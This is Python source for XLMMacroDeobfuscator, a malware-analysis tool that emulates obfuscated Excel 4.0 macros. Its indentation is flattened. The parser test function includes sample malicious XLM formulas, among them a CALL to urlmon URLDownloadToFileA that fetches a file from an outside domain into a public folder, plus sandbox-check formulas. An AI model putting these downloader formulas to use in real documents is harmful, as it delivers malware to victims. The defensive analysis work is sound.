text = 'Kernel32.WriteProcessMemory({},{},"{}",{},{})'.format(
args_eval_result[0].get_text(),
base_address,
mem_data.hex(),
size,
args_eval_result[4].get_text())
return_val = 0
if status != EvalStatus.FullEvaluation:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
def RtlCopyMemory_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
if len(arguments) == 3:
destination_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
src_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
size_res = self.evaluate_parse_tree(current_cell, arguments[2], interactive)
if destination_eval_res.status == EvalStatus.FullEvaluation and \
src_eval_res.status == EvalStatus.FullEvaluation:
status = EvalStatus.FullEvaluation
mem_data = src_eval_res.value
mem_data = bytearray([ord(x) for x in mem_data])
if not self.write_memory(int(destination_eval_res.value), mem_data, len(mem_data)):
status = EvalStatus.Error
text = 'Kernel32.RtlCopyMemory({},"{}",{})'.format(
destination_eval_res.get_text(),
mem_data.hex(),
size_res.get_text())
if status == EvalStatus.PartialEvaluation:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
# endregion
def write_memory(self, base_address, mem_data, size):
result = True
for mem_rec in self._memory:
if mem_rec['base'] <= base_address <= mem_rec['base'] + mem_rec['size']:
if mem_rec['base'] <= base_address + size <= mem_rec['base'] + mem_rec['size']:
offset = base_address - mem_rec['base']
for i in range(0, size):
mem_rec['data'][offset + i] = mem_data[i]
else:
result = False
break
return result
def evaluate_parse_tree(self, current_cell, parse_tree_root, interactive=True):
current_cell.emulated = True
next_cell = None
status = EvalStatus.NotImplemented
text = None
return_val = None
if debug:
print("EVALUATE_PARSE_TREE!!")
print(current_cell)
print(parse_tree_root)
if type(parse_tree_root) is Token:
if debug:
print("THERE: 1")
if parse_tree_root.value in self.defined_names:
# this formula has a defined name that can be changed
# current formula must be removed from cache
self._remove_current_formula_from_cache = True
parse_tree_root.value = self.defined_names[parse_tree_root.value.lower()]
text = parse_tree_root.value
status = EvalStatus.FullEvaluation
return_val = text
result = EvalResult(next_cell, status, return_val, text)
elif type(parse_tree_root) is list:
if debug:
print("THERE: 2")
return_val = text = ''
status = EvalStatus.FullEvaluation
result = EvalResult(next_cell, status, return_val, text)
elif parse_tree_root.data == 'function_call':
if debug:
print("THERE: 3")
result = self.evaluate_function(current_cell, parse_tree_root, interactive)
elif parse_tree_root.data == 'cell':
if debug:
print("THERE: 4")
result = self.evaluate_cell(current_cell, interactive, parse_tree_root)
elif parse_tree_root.data == 'range':
if debug:
print("THERE: 5")
result = self.evaluate_range(current_cell, interactive, parse_tree_root)
elif parse_tree_root.data in self._expr_rule_names:
if debug:
print("THERE: 6")
text_left = None
concat_status = EvalStatus.FullEvaluation
for index, child in enumerate(parse_tree_root.children):
if type(child) is Token and child.type in ['ADDITIVEOP', 'MULTIOP', 'CMPOP', 'CONCATOP']:
op_str = str(child)
right_arg = parse_tree_root.children[index + 1]
right_arg_eval_res = self.evaluate_parse_tree(current_cell, right_arg, interactive)
text_right = right_arg_eval_res.get_text(unwrap=True)
if op_str == '&':
if left_arg_eval_res.status == EvalStatus.FullEvaluation and right_arg_eval_res.status != EvalStatus.FullEvaluation:
text_left = '{}&{}'.format(text_left, text_right)
left_arg_eval_res.status = EvalStatus.PartialEvaluation
concat_status = EvalStatus.PartialEvaluation
elif left_arg_eval_res.status != EvalStatus.FullEvaluation and right_arg_eval_res.status == EvalStatus.FullEvaluation:
text_left = '{}&{}'.format(text_left, text_right)
left_arg_eval_res.status = EvalStatus.FullEvaluation
concat_status = EvalStatus.PartialEvaluation
elif left_arg_eval_res.status != EvalStatus.FullEvaluation and right_arg_eval_res.status != EvalStatus.FullEvaluation:
text_left = '{}&{}'.format(text_left, text_right)
left_arg_eval_res.status = EvalStatus.PartialEvaluation
concat_status = EvalStatus.PartialEvaluation
else:
text_left = text_left + text_right
elif left_arg_eval_res.status == EvalStatus.FullEvaluation and right_arg_eval_res.status == EvalStatus.FullEvaluation:
status = EvalStatus.FullEvaluation
value_right = right_arg_eval_res.value
if self.is_float(value_left) and self.is_float(value_right):
if op_str in self._operators:
op_res = self._operators[op_str](float(value_left), float(value_right))
if type(op_res) == bool:
value_left = str(op_res)
elif op_res.is_integer():
value_left = str(int(op_res))
else:
op_res = round(op_res, 10)
value_left = str(op_res)
else:
value_left = 'Operator ' + op_str
left_arg_eval_res.status = EvalStatus.NotImplemented
else:
if op_str in self._operators:
value_left = EvalResult.unwrap_str_literal(str(value_left))
value_right = EvalResult.unwrap_str_literal(str(value_right))
op_res = self._operators[op_str](value_left, value_right)
value_left = op_res
else:
value_left = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
left_arg_eval_res.status = EvalStatus.PartialEvaluation
text_left = value_left
else:
left_arg_eval_res.status = EvalStatus.PartialEvaluation
text_left = '{}{}{}'.format(text_left, op_str, text_right)
return_val = text_left
else:
if text_left is None:
left_arg = parse_tree_root.children[index]
left_arg_eval_res = self.evaluate_parse_tree(current_cell, left_arg, interactive)
text_left = left_arg_eval_res.get_text(unwrap=True)
value_left = left_arg_eval_res.value
if concat_status == EvalStatus.PartialEvaluation and left_arg_eval_res.status == EvalStatus.FullEvaluation:
if debug:
print("THERE: 7")
left_arg_eval_res.status = concat_status
result = EvalResult(next_cell, left_arg_eval_res.status, return_val, EvalResult.wrap_str_literal(text_left))
elif parse_tree_root.data == 'final':
if debug:
print("THERE: 8")
arg = parse_tree_root.children[1]
result = self.evaluate_parse_tree(current_cell, arg, interactive)
else:
if debug:
print("THERE: 9")
status = EvalStatus.FullEvaluation
for child_node in parse_tree_root.children:
if child_node is not None:
child_eval_result = self.evaluate_parse_tree(current_cell, child_node, interactive)
if child_eval_result.status != EvalStatus.FullEvaluation:
status = child_eval_result.status
result = EvalResult(child_eval_result.next_cell, status, child_eval_result.value, child_eval_result.text)
result.output_level = child_eval_result.output_level
return result
def evaluate_cell(self, current_cell, interactive, parse_tree_root):
current_cell.emulated = True
sheet_name, col, row = self.get_cell_addr(current_cell, parse_tree_root)
return_val = ''
text = ''
status = EvalStatus.PartialEvaluation
if sheet_name is not None:
cell_addr = col + str(row)
sheet = self.xlm_wrapper.get_macrosheets()[sheet_name]
if cell_addr not in sheet.cells and (sheet_name, cell_addr) in self.cell_with_unsuccessfull_set:
if interactive:
self.invoke_interpreter = True
if self.first_unknown_cell is None:
self.first_unknown_cell = cell_addr
if cell_addr in sheet.cells:
cell = sheet.cells[cell_addr]
if cell.value is not None and cell.value != cell.formula:
text = EvalResult.wrap_str_literal(cell.value)
return_val = text
status = EvalStatus.FullEvaluation
elif cell.formula is not None:
parse_tree = self.xlm_parser.parse(cell.formula)
eval_result = self.evaluate_parse_tree(cell, parse_tree, False)
return_val = eval_result.value
text = eval_result.get_text()
status = eval_result.status
else:
text = "{}".format(cell_addr)
else:
if (sheet_name, cell_addr) in self.cell_with_unsuccessfull_set:
text = "{}".format(cell_addr)
else:
text = ''
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def evaluate_range(self, current_cell, interactive, parse_tree_root):
current_cell.emulated = True
status = EvalStatus.PartialEvaluation
if len(parse_tree_root.children) >= 3:
start_address = self.get_cell_addr(current_cell, parse_tree_root.children[0])
end_address = self.get_cell_addr(current_cell, parse_tree_root.children[2])
selected = None
if len(parse_tree_root.children) == 5:
selected = self.get_cell_addr(current_cell, parse_tree_root.children[4])
self.selected_range = (start_address, end_address, selected)
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
retunr_val = 0
return EvalResult(None, status, retunr_val, text)
def interactive_shell(self, current_cell, message):
print('\nProcess Interruption:')
print('CELL:{:10}{}'.format(current_cell.get_local_address(), current_cell.formula))
print(message)
print('Enter XLM macro:')
print('Tip: CLOSE() or HALT() to exist')
while True:
line = input()
line = '=' + line.strip()
if line:
try:
parse_tree = self.xlm_parser.parse(line)
ret_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive=False)
print(ret_result.value)
if ret_result.status == EvalStatus.End:
break
except ParseError as exp:
print("Invalid XLM macro")
except KeyboardInterrupt:
sys.exit()
else:
break
def has_loop(self, path, length=10):
if len(path) < length * 2:
return False
else:
result = False
start_index = len(path) - length
for j in range(0, start_index - length):
matched = True
k = j
while start_index + k - j < len(path):
if path[k] != path[start_index + k - j]:
matched = False
break
k += 1
if matched:
result = True
break
return result
regex_string = r'\"([^\"]|\"\")*\"'
detect_string = re.compile(regex_string, flags=re.MULTILINE)
def extract_strings(self, string):
result = []
matches = XLMInterpreter.detect_string.finditer(string)
for matchNum, match in enumerate(matches, start=1):
result.append(match.string[match.start(0):match.end(0)])
return result
def do_brute_force_emulation(self, silent_mode=False):
# Emulate each previously unemulated cell. Just do this on the same sheet as
# the original cells used to start emulation.
for start_point in self.auto_open_labels:
start_point = start_point[1]
sheet_name, _, _ = Cell.parse_cell_addr(start_point)
sheets = self.xlm_wrapper.get_macrosheets()
#print("START BRUTE!!")
#print(sheet_name)
#print(start_point)
if sheet_name in sheets:
sheet = sheets[sheet_name]
#print("\nBRUTE CELLS!!")
for cell_addr in sheet.cells.keys():
# Do we need to emulate this cell?
curr_cell = sheet.cells[cell_addr]
if ((curr_cell.formula is None) or (curr_cell.emulated)):
# No, skip it.
continue
# Yes, we need to emulate this cell.
# Parse and emulate the cell formula.
#print(sheet.cells[cell_addr].debug())
parse_tree = None
try:
parse_tree = self.xlm_parser.parse(curr_cell.formula)
except ParseError:
continue
evaluation_result = self.evaluate_parse_tree(curr_cell, parse_tree, interactive=False)
print(evaluation_result)
def deobfuscate_macro(self, interactive, start_point="", silent_mode=False, brute_force=False):
result = []
self.auto_open_labels = self.xlm_wrapper.get_defined_name('auto_open', full_match=False)
if len(self.auto_open_labels) == 0:
if len(start_point) > 0:
self.auto_open_labels = [('auto_open', start_point)]
elif interactive:
print('There is no entry point, please specify a cell address to start')
print('Example: Sheet1!A1')
self.auto_open_labels = [('auto_open', input().strip())]
if self.auto_open_labels is not None and len(self.auto_open_labels) > 0:
macros = self.xlm_wrapper.get_macrosheets()
for auto_open_label in self.auto_open_labels:
try:
sheet_name, col, row = Cell.parse_cell_addr(auto_open_label[1])
if sheet_name in macros:
current_cell = self.get_formula_cell(macros[sheet_name], col, row)
self._branch_stack = [(current_cell, current_cell.formula, macros[sheet_name].cells, 0, '')]
observed_cells = []
while len(self._branch_stack) > 0:
current_cell, formula, saved_cells, indent_level, desc = self._branch_stack.pop()
macros[current_cell.sheet.name].cells = saved_cells
self._indent_level = indent_level
stack_record = True
while current_cell is not None:
if type(formula) is str:
replace_op = getattr(self.xlm_wrapper, "replace_nonprintable_chars", None)
if callable(replace_op):
formula = replace_op(formula, '_')
if formula not in self._formula_cache:
parse_tree = self.xlm_parser.parse(formula)
self._formula_cache[formula] = parse_tree
else:
parse_tree = self._formula_cache[formula]
else:
parse_tree = formula
if stack_record:
previous_indent = self._indent_level - 1 if self._indent_level > 0 else 0
else:
previous_indent = self._indent_level
evaluation_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive)
if self._remove_current_formula_from_cache:
self._remove_current_formula_from_cache = False
if formula in self._formula_cache:
del(self._formula_cache[formula])
if len(self._while_stack) == 0 and evaluation_result.text != 'NEXT':
observed_cells.append(current_cell.get_local_address())
if self.has_loop(observed_cells):
break
if self.invoke_interpreter and interactive:
self.interactive_shell(current_cell,
'Partial Eval: {}\r\n{} is not populated, what should be its value?'.format(
evaluation_result.text,
self.first_unknown_cell))
self.invoke_interpreter = False
self.first_unknown_cell = None
continue
if evaluation_result.value is not None:
current_cell.value = str(evaluation_result.value)
if evaluation_result.next_cell is None and \
(evaluation_result.status == EvalStatus.FullEvaluation or
evaluation_result.status == EvalStatus.PartialEvaluation or
evaluation_result.status == EvalStatus.NotImplemented or
evaluation_result.status == EvalStatus.IGNORED):
evaluation_result.next_cell = self.get_formula_cell(current_cell.sheet,
current_cell.column,
str(int(current_cell.row) + 1))
if stack_record:
evaluation_result.text = (
desc + ' ' + evaluation_result.get_text(unwrap=False)).strip()
if self._indent_current_line:
previous_indent = self._indent_level
self._indent_current_line = False
if evaluation_result.status != EvalStatus.IGNORED:
if self.output_level >= 3 and evaluation_result.output_level == 2:
strings = self.extract_strings(evaluation_result.get_text(unwrap=True))
if strings:
yield (
current_cell, evaluation_result.status,
'\n'.join(strings),
previous_indent)
elif evaluation_result.output_level >= self.output_level:
yield (
current_cell, evaluation_result.status,
evaluation_result.get_text(unwrap=False),
previous_indent)
if debug:
print("END OF LOOP!!")
print("CURRENT CELL:")
print(current_cell.debug())
if evaluation_result.next_cell is not None:
current_cell = evaluation_result.next_cell
if debug:
print("NEXT CELL:")
print(current_cell.debug())
else:
if debug:
print("NEXT CELL:")
print("NO NEXT CELL")
break
formula = current_cell.formula
stack_record = False
# We are done with the proper emulation loop. Now perform a
# "brute force" emulation of any unemulated cells if needed.
if brute_force:
self.do_brute_force_emulation(silent_mode=silent_mode)
except Exception as exp:
exc_type, exc_obj, traceback = sys.exc_info()
frame = traceback.tb_frame
lineno = traceback.tb_lineno
filename = frame.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, frame.f_globals)
if debug:
raise exp
uprint('Error [{}:{} {}]: {}'.format(os.path.basename(filename),
lineno,
line.strip(),
exc_obj),
silent_mode=silent_mode)
def test_parser():
grammar_file_path = os.path.join(os.path.dirname(__file__), 'xlm-macro-en.lark')
macro_grammar = open(grammar_file_path, 'r', encoding='utf_8').read()
xlm_parser = Lark(macro_grammar, parser='lalr')
print("\n=HALT()")
print(xlm_parser.parse("=HALT()"))
print("\n=171*GET.CELL(19,A81)")
print(xlm_parser.parse("=171*GET.CELL(19,A81)"))
print("\n=FORMULA($ET$1796&$BE$1701&$DB$1527&$BU$714&$CT$1605)")
print(xlm_parser.parse("=FORMULA($ET$1796&$BE$1701&$DB$1527&$BU$714&$CT$1605)"))
print("\n=RUN($DC$240)")
print(xlm_parser.parse("=RUN($DC$240)"))
print("\n=CHAR($IE$1109-308)")
print(xlm_parser.parse("=CHAR($IE$1109-308)"))
print("\n=CALL($C$649,$FN$698,$AM$821,0,$BB$54,$BK$36,0,0)")
print(xlm_parser.parse("=CALL($C$649,$FN$698,$AM$821,0,$BB$54,$BK$36,0,0)"))
print("\n=HALT()")
print(xlm_parser.parse("=HALT()"))
print('\n=WAIT(NOW()+"00:00:03")')
print(xlm_parser.parse('=WAIT(NOW()+"00:00:03")'))
print("\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))")
print(xlm_parser.parse("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))"))
print(r'\n=OPEN(GET.WORKSPACE(48)&"\WZTEMPLT.XLA")')
print(xlm_parser.parse(r'=OPEN(GET.WORKSPACE(48)&"\WZTEMPLT.XLA")'))
print(
"""\n=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\\Users\\Public\\bwep5ef.html",0,0),)""")
print(xlm_parser.parse(
"""=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\\Users\\Public\\bwep5ef.html",0,0),)"""))
_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
def get_file_type(path):
file_type = None
with open(path, 'rb') as input_file:
start_marker = input_file.read(2)
if start_marker == b'\xD0\xCF':
file_type = 'xls'
elif start_marker == b'\x50\x4B':
file_type = 'xlsm/b'
if file_type == 'xlsm/b':
raw_bytes = open(path, 'rb').read()
if bytes('workbook.bin', 'ascii') in raw_bytes:
file_type = 'xlsb'
else:
file_type = 'xlsm'
return file_type
def show_cells(excel_doc):
macrosheets = excel_doc.get_macrosheets()
auto_open_labels = excel_doc.get_defined_name('auto_open', full_match=False)
for macrosheet_name in macrosheets:
# yield 'SHEET: {}, {}'.format(macrosheets[macrosheet_name].name,
# macrosheets[macrosheet_name].type)
yield macrosheets[macrosheet_name].name, macrosheets[macrosheet_name].type
for formula_loc, info in macrosheets[macrosheet_name].cells.items():
if info.formula is not None:
yield info, 'EXTRACTED', info.formula, '', info.value
# yield 'CELL:{:10}, {:20}, {}'.format(formula_loc, info.formula, info.value)
for formula_loc, info in macrosheets[macrosheet_name].cells.items():
if info.formula is None:
# yield 'CELL:{:10}, {:20}, {}'.format(formula_loc, str(info.formula), info.value)
yield info, 'EXTRACTED', str(info.formula), '', info.value,
def uprint(*objects, sep=' ', end='\n', file=sys.stdout, silent_mode=False):
if silent_mode:
return
enc = file.encoding
if enc == 'UTF-8':
print(*objects, sep=sep, end=end, file=file)
else:
f = lambda obj: str(obj).encode(enc, errors='backslashreplace').decode(enc)
print(*map(f, objects), sep=sep, end=end, file=file)
def get_formula_output(interpretation_result, format_str, with_index=True):
cell_addr = interpretation_result[0].get_local_address()
status = interpretation_result[1]
formula = interpretation_result[2]
indent = ''.join(['\t'] * interpretation_result[3])
result = ''
if format_str is not None and type(format_str) is str:
result = format_str
result = result.replace('[[CELL-ADDR]]', '{:10}'.format(cell_addr))
result = result.replace('[[STATUS]]', '{:20}'.format(status.name))
if with_index:
formula = indent + formula
result = result.replace('[[INT-FORMULA]]', formula)
return result
def convert_to_json_str(file, defined_names, records, memory=None, files=None):
file_content = open(file, 'rb').read()
md5 = hashlib.md5(file_content).hexdigest()
sha256 = hashlib.sha256(file_content).hexdigest()
if defined_names:
for key, val in defined_names.items():
if isinstance(val, Tree):
defined_names[key]= XLMInterpreter.convert_ptree_to_str(val)
res = {'file_path': file, 'md5_hash': md5, 'sha256_hash': sha256, 'analysis_timestamp': int(time.time()),
'format_version': 1, 'analyzed_by': 'XLMMacroDeobfuscator',
'link': 'https://github.com/DissectMalware/XLMMacroDeobfuscator', 'defined_names': defined_names,
'records': [], 'memory_records': [], 'files':[]}
res["iocs"] = list(intermediate_iocs)
for index, i in enumerate(records):
if len(i) == 4:
res['records'].append({'index': index,
'sheet': i[0].sheet.name,
'cell_add': i[0].get_local_address(),
'status': str(i[1]),
'formula': i[2]})
elif len(i) == 5:
res['records'].append({'index': index,
'sheet': i[0].sheet.name,
'cell_add': i[0].get_local_address(),
'status': str(i[1]),
'formula': i[2],
'value': str(i[4])})
if memory:
for mem_rec in memory:
res['memory_records'].append({
'base': mem_rec['base'],
'size': mem_rec['size'],
'data_base64': bytearray(mem_rec['data']).hex()
})
if files:
for file in files:
if len(files[file]['file_content'])>0:
bytes_str = files[file]['file_content'].encode('utf_8')
base64_str = base64.b64encode(bytes_str).decode()
res['files'].append({
'path': file,
'access': files[file]['file_access'],
'content_base64': base64_str
})
return res
def try_decrypt(file, password=''):
is_encrypted = False
tmp_file_path = None
try:
msoffcrypto_obj = msoffcrypto.OfficeFile(open(file, "rb"))
if msoffcrypto_obj.is_encrypted():
is_encrypted = True
temp_file_args = {'prefix': 'decrypt-', 'suffix': os.path.splitext(file)[1], 'text': False}
tmp_file_handle = None
try:
msoffcrypto_obj.load_key(password=password)
tmp_file_handle, tmp_file_path = mkstemp(**temp_file_args)
with os.fdopen(tmp_file_handle, 'wb') as tmp_file:
msoffcrypto_obj.decrypt(tmp_file)
except:
if tmp_file_handle:
tmp_file_handle.close()
os.remove(tmp_file_path)
tmp_file_path = None
except Exception as exp:
if debug:
raise exp
uprint(str(exp), silent_mode=SILENT)
return tmp_file_path, is_encrypted
def get_logo():
return """
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
"""
def process_file(**kwargs):
""" Example of kwargs when using as library
{
'file': '/tmp/8a6e4c10c30b773147d0d7c8307d88f1cf242cb01a9747bfec0319befdc1fcaf',
'noninteractive': True,
'extract_only': False,
'with_ms_excel': False,
'start_with_shell': False,
'return_deobfuscated': True,
'day': 0,
'output_formula_format': 'CELL:[[CELL-ADDR]], [[STATUS]], [[INT-FORMULA]]',
'start_point': ''
}
"""
deobfuscated = list()
interpreted_lines = list()
file_path = os.path.abspath(kwargs.get('file'))
file_type = get_file_type(file_path)
password = kwargs.get('password', 'VelvetSweatshop')
uprint('File: {}\n'.format(file_path), silent_mode=SILENT)
if file_type is None:
raise Exception('Input file type is not supported.')
decrypted_file_path = is_encrypted = None
decrypted_file_path, is_encrypted = try_decrypt(file_path, password)
if is_encrypted:
uprint('Encrypted {} file'.format(file_type), silent_mode=SILENT)
if decrypted_file_path is None:
raise Exception(
'Failed to decrypt {}\nUse --password switch to provide the correct password'.format(file_path))
file_path = decrypted_file_path
else:
uprint('Unencrypted {} file\n'.format(file_type), silent_mode=SILENT)
try:
start = time.time()
excel_doc = None
uprint('[Loading Cells]', silent_mode=SILENT)
if file_type == 'xls':
if kwargs.get("no_ms_excel", False):
print('--with-ms-excel switch is now deprecated (by default, MS-Excel is not used)\n'
'If you want to use MS-Excel, use --with-ms-excel')
if not kwargs.get("with_ms_excel", False):
excel_doc = XLSWrapper2(file_path)
else:
try:
excel_doc = XLSWrapper(file_path)
except Exception as exp:
print("Error: MS Excel is not installed, now xlrd2 library will be used insteads\n" +
"(Use --no-ms-excel switch if you do not have/want to use MS Excel)")
excel_doc = XLSWrapper2(file_path)
elif file_type == 'xlsm':
excel_doc = XLSMWrapper(file_path)
elif file_type == 'xlsb':
excel_doc = XLSBWrapper(file_path)
if excel_doc is None:
raise Exception('Input file type is not supported.')
auto_open_labels = excel_doc.get_defined_name('auto_open', full_match=False)
for label in auto_open_labels:
uprint('auto_open: {}->{}'.format(label[0], label[1]))
if kwargs.get("extract_only"):
if kwargs.get("export_json"):
records = []
for i in show_cells(excel_doc):
if len(i) == 5:
records.append(i)
uprint('[Dumping to Json]', silent_mode=SILENT)
res = convert_to_json_str(file_path, excel_doc.get_defined_names(), records)
try:
output_file_path = kwargs.get("export_json")
print(res)
with open(output_file_path, 'w', encoding='utf_8') as output_file:
output_file.write(json.dumps(res, indent=4))
uprint('Result is dumped into {}'.format(output_file_path), silent_mode=SILENT)
except Exception as exp:
print('Error: unable to dump the result into the specified file\n{}'.format(str(exp)))
uprint('[End of Dumping]', SILENT)
if not kwargs.get("return_deobfuscated"):
return res
else:
res = []
for i in show_cells(excel_doc):
rec_str = ''
if len(i) == 2:
rec_str = 'SHEET: {}, {}'.format(i[0], i[1])
elif len(i) == 5:
rec_str = 'CELL:{:10}, {:20}, {}'.format(i[0].get_local_address(), i[2], i[4])
if rec_str:
if not kwargs.get("return_deobfuscated"):
uprint(rec_str)
res.append(rec_str)
if kwargs.get("return_deobfuscated"):
return res
else:
uprint('[Starting Deobfuscation]', silent_mode=SILENT)
interpreter = XLMInterpreter(excel_doc, output_level=kwargs.get("output_level", 0))
if kwargs.get("day", 0) > 0:
interpreter.day_of_month = kwargs.get("day")
interactive = not kwargs.get("noninteractive")
if kwargs.get("start_with_shell"):
starting_points = interpreter.xlm_wrapper.get_defined_name('auto_open', full_match=False)
if len(starting_points) == 0:
if len(kwargs.get("start_point")) > 0:
starting_points = [('auto_open', kwargs.get("start_point"))]
elif interactive:
print('There is no entry point, please specify a cell address to start')
print('Example: Sheet1!A1')
auto_open_labels = [('auto_open', input().strip())]
sheet_name, col, row = Cell.parse_cell_addr(starting_points[0][1])
macros = interpreter.xlm_wrapper.get_macrosheets()
if sheet_name in macros:
current_cell = interpreter.get_formula_cell(macros[sheet_name], col, row)
interpreter.interactive_shell(current_cell, "")
output_format = kwargs.get("output_formula_format", 'CELL:[[CELL-ADDR]], [[STATUS]], [[INT-FORMULA]]')
start_point = kwargs.get("start_point", '')
for step in interpreter.deobfuscate_macro(interactive, start_point, brute_force=kwargs["brute"]):
if kwargs.get("return_deobfuscated"):
deobfuscated.append(
get_formula_output(step, output_format, not kwargs.get("no_indent")))
elif kwargs.get("export_json"):
interpreted_lines.append(step)
else:
uprint(get_formula_output(step, output_format, not kwargs.get("no_indent")))
if interpreter.day_of_month is not None:
uprint('[Day of Month] {}'.format(interpreter.day_of_month))
if not kwargs.get("export_json") and not kwargs.get("return_deobfuscated"):
for mem_record in interpreter._memory:
uprint('Memory: base {}, size {}\n{}\n'.format(mem_record['base'],
mem_record['size'],
bytearray(mem_record['data']).hex()))
uprint('\nFiles:\n')
for file in interpreter._files:
if len(interpreter._files[file]['file_content'])>0:
uprint('Files: path {}, access {}\n{}\n'.format(file,
interpreter._files[file]['file_access'],
interpreter._files[file]['file_content']))
uprint('[END of Deobfuscation]', silent_mode=SILENT)
uprint('\n[Intermediate IOCs]\n', silent_mode=SILENT)
for ioc in intermediate_iocs:
uprint(ioc, silent_mode=SILENT)
uprint('\n', silent_mode=SILENT)
if kwargs.get("export_json"):
uprint('[Dumping Json]', silent_mode=SILENT)
res = convert_to_json_str(file_path, excel_doc.get_defined_names(), interpreted_lines,
interpreter._memory, interpreter._files)
try:
output_file_path = kwargs.get("export_json")
with open(output_file_path, 'w', encoding='utf_8') as output_file:
output_file.write(json.dumps(res, indent=4))
uprint('Result is dumped into {}'.format(output_file_path), silent_mode=SILENT)
except Exception as exp:
print('Error: unable to dump the result into the specified file\n{}'.format(str(exp)))
uprint('[End of Dumping]', silent_mode=SILENT)
if kwargs.get("return_deobfuscated"):
return res
uprint('time elapsed: ' + str(time.time() - start), silent_mode=SILENT)
finally:
if HAS_XLSWrapper and type(excel_doc) is XLSWrapper:
excel_doc._excel.Application.DisplayAlerts = False
excel_doc._excel.Application.Quit()
if kwargs.get("return_deobfuscated"):
return deobfuscated
def main():
print(get_logo())
print('XLMMacroDeobfuscator(v{}) - {}\n'.format(__version__,
"https://github.com/DissectMalware/XLMMacroDeobfuscator"))
config_parser = argparse.ArgumentParser(add_help=False)
config_parser.add_argument("-c", "--config-file",
help="Specify a config file (must be a valid JSON file)", metavar="FILE_PATH")
args, remaining_argv = config_parser.parse_known_args()
defaults = {}
if args.config_file:
try:
with open(args.config_file,'r',encoding='utf_8') as config_file:
defaults = json.load(config_file)
defaults = {x.replace('-','_'): y for x, y in defaults.items()}
except json.decoder.JSONDecodeError as json_exp:
uprint(
'Config file cannot be parsed (must be a valid json file, '
'validate your file with an online JSON validator)',
silent_mode=SILENT)
arg_parser = argparse.ArgumentParser(parents=[config_parser])
arg_parser.add_argument("-f", "--file", type=str, action='store',
help="The path of a XLSM file", metavar=('FILE_PATH'))
arg_parser.add_argument("-n", "--noninteractive", default=False, action='store_true',
help="Disable interactive shell")
arg_parser.add_argument("-b", "--brute", default=False, action='store_true',
help="Brute force emulate any cells not covered by structured emulation")
arg_parser.add_argument("-x", "--extract-only", default=False, action='store_true',
help="Only extract cells without any emulation")
arg_parser.add_argument("-2", "--no-ms-excel", default=False, action='store_true',
help="[Deprecated] Do not use MS Excel to process XLS files")
arg_parser.add_argument("--with-ms-excel", default=False, action='store_true',
help="Use MS Excel to process XLS files")
arg_parser.add_argument("-s", "--start-with-shell", default=False, action='store_true',
help="Open an XLM shell before interpreting the macros in the input")
arg_parser.add_argument("-d", "--day", type=int, default=-1, action='store',
help="Specify the day of month", )
arg_parser.add_argument("--output-formula-format", type=str,
default="CELL:[[CELL-ADDR]], [[STATUS]], [[INT-FORMULA]]",
action='store',
help="Specify the format for output formulas "
"([[CELL-ADDR]], [[INT-FORMULA]], and [[STATUS]]", )
arg_parser.add_argument("--no-indent", default=False, action='store_true',
help="Do not show indent before formulas")
arg_parser.add_argument("--export-json", type=str, action='store',
help="Export the output to JSON", metavar=('FILE_PATH'))
arg_parser.add_argument("--start-point", type=str, default="", action='store',
help="Start interpretation from a specific cell address", metavar=('CELL_ADDR'))
arg_parser.add_argument("-p", "--password", type=str, action='store', default='',
help="Password to decrypt the protected document")
arg_parser.add_argument("-o", "--output-level", type=int, action='store', default=0,
help="Set the level of details to be shown "
"(0:all commands, 1: commands no jump "
"2:important commands 3:strings in important commands).")
arg_parser.set_defaults(**defaults)
args = arg_parser.parse_args(remaining_argv)
if not args.file:
print('Error: --file is missing\n')
arg_parser.print_help()
elif not os.path.exists(args.file):
print('Error: input file does not exist')
else:
try:
# Convert args to kwarg dict
try:
process_file(**vars(args))
except Exception as exp:
if debug:
raise exp
exc_type, exc_obj, traceback = sys.exc_info()
frame = traceback.tb_frame
lineno = traceback.tb_lineno
filename = frame.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, frame.f_globals)
print('Error [{}:{} {}]: {}'.format(os.path.basename(filename),
lineno,
line.strip(),
exc_obj))
except KeyboardInterrupt:
pass
SILENT = False
if __name__ == '__main__':
main()
| 46.066331
| 150
| 0.565998
|
